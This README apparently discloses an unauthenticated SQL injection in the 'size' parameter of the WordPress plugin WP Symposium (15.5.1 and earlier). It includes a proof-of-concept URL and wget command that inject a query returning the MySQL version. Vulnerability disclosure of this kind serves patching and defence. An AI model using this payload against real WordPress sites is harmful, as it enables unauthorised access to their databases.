.. | |||
README.md | Loading last commit info... |
README.md
WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
Description:
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an
unauthenticated SQL Injection in get_album_item.php, parameter 'size'.
The issue is exploitable even if the plugin is deactivated.
Proof of Concept
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt
In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1
References
https://www.exploit-db.com/exploits/37824https://wpscan.com/vulnerability/8140